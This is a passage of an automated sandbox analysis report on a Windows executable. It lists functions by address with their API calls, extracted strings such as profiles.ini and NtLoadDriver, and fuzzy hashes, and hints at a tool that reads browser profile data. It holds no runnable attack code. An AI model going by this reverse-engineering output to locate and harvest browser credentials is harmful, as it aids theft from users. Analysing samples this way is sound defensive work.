                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                                • String ID: %s:$EDIT$STATIC
                                                                                                                                                                • API String ID: 2080319088-3046471546
                                                                                                                                                                • Opcode ID: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                                                                                                                                • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                                                                                • Opcode Fuzzy Hash: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                                                                                                                                • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                                                                • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                                                                • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                                                                • memset.MSVCRT ref: 00413292
                                                                                                                                                                • memset.MSVCRT ref: 004132B4
                                                                                                                                                                • memset.MSVCRT ref: 004132CD
                                                                                                                                                                • memset.MSVCRT ref: 004132E1
                                                                                                                                                                • memset.MSVCRT ref: 004132FB
                                                                                                                                                                • memset.MSVCRT ref: 00413310
                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                                                                • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                                                                • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                                                                • memset.MSVCRT ref: 004133C0
                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                                                                • memcpy.MSVCRT ref: 004133FC
                                                                                                                                                                • wcscpy.MSVCRT ref: 0041341F
                                                                                                                                                                • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                                                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                                                                • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                                                                Strings
                                                                                                                                                                • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                                                                • {Unknown}, xrefs: 004132A6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                                • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                                • API String ID: 4111938811-1819279800
                                                                                                                                                                • Opcode ID: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                                                                                                                                • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                                                                                • Opcode Fuzzy Hash: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                                                                                                                                • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                                                                • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                                                                • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                                                                • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                                                                • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                                                                • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                                                                • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                                                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                                                                • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 829165378-0
                                                                                                                                                                • Opcode ID: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                                                                                                                • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                                                                                • Opcode Fuzzy Hash: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                                                                                                                • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 00404172
                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                • wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                • wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                • memset.MSVCRT ref: 00404200
                                                                                                                                                                • memset.MSVCRT ref: 00404215
                                                                                                                                                                • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                • wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                • memset.MSVCRT ref: 0040426E
                                                                                                                                                                • memset.MSVCRT ref: 004042CD
                                                                                                                                                                • memset.MSVCRT ref: 004042E2
                                                                                                                                                                • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                                                                • wcscpy.MSVCRT ref: 00404311
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                                                                • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                                                                • API String ID: 2454223109-1580313836
                                                                                                                                                                • Opcode ID: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                                                                                                                • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                                                                • Opcode Fuzzy Hash: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                                                                                                                • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                                                                • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                                                                • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                                                                • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                                                                • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                                                                • memcpy.MSVCRT ref: 004115C8
                                                                                                                                                                • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                                                                • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                                                                • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                                                                • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                                                                • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                                                                • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                                                                  • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                                                                  • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                                                                • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                                                                • API String ID: 4054529287-3175352466
                                                                                                                                                                • Opcode ID: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                                                                                                                • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                                                                • Opcode Fuzzy Hash: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                                                                                                                • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                                                                • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                • API String ID: 3143752011-1996832678
                                                                                                                                                                • Opcode ID: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                                                                                                                                                • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                                                                                                • Opcode Fuzzy Hash: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                                                                                                                                                • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                                • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                                • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                                • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                                • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                                • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                                • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                                • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                                                                • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                                                • API String ID: 667068680-2887671607
                                                                                                                                                                • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                                                                                • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                                • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                • API String ID: 1607361635-601624466
                                                                                                                                                                • Opcode ID: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                                                                                                                                • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                                                                                • Opcode Fuzzy Hash: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                                                                                                                                • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                • API String ID: 2000436516-3842416460
                                                                                                                                                                • Opcode ID: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                                                                                                                                • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                                                                • Opcode Fuzzy Hash: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                                                                                                                                • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                                                                  • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                                                                  • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                  • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                  • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                                                                • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                                                                • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                                                                • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                                                                • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                                                                • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                                                                • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                                                                • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                                                                • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                                                                • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1043902810-0
                                                                                                                                                                • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                                                                                • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                                                                • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                                • API String ID: 2899246560-1542517562
                                                                                                                                                                • Opcode ID: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                                                                                                                                • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                                                                                • Opcode Fuzzy Hash: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                                                                                                                                • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • memset.MSVCRT ref: 0040DBCD
                                                                                                                                                                • memset.MSVCRT ref: 0040DBE9
                                                                                                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                                                                  • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                                                                                                                                  • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                  • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                                                                                • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                                                                                • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                                                                                • EnumResourceNamesW.KERNEL32(0040DD4B,00000004,0040D957,00000000), ref: 0040DCB1
                                                                                                                                                                • EnumResourceNamesW.KERNEL32(0040DD4B,00000005,0040D957,00000000), ref: 0040DCBB
                                                                                                                                                                • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000089.00000002.56267328410.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                                                                                • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                                • API String ID: 3330709923-517860148
                                                                                                                                                                • Opcode ID: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                                                                                                                • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                                                                                                • Opcode Fuzzy Hash: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                                                                                                                • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                  • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                • memset.MSVCRT ref: 0040806A
                                                                                                                                                                • memset.MSVCRT ref: 0040807F
                                                                                                                                                                • _wtoi.MSVCRT ref: 004081AF
                                                                                                                                                                • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                                                                                • memset.MSVCRT ref: 004081E4
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                                                                                  • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                                                                                  • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                                                                                  • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                                                                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
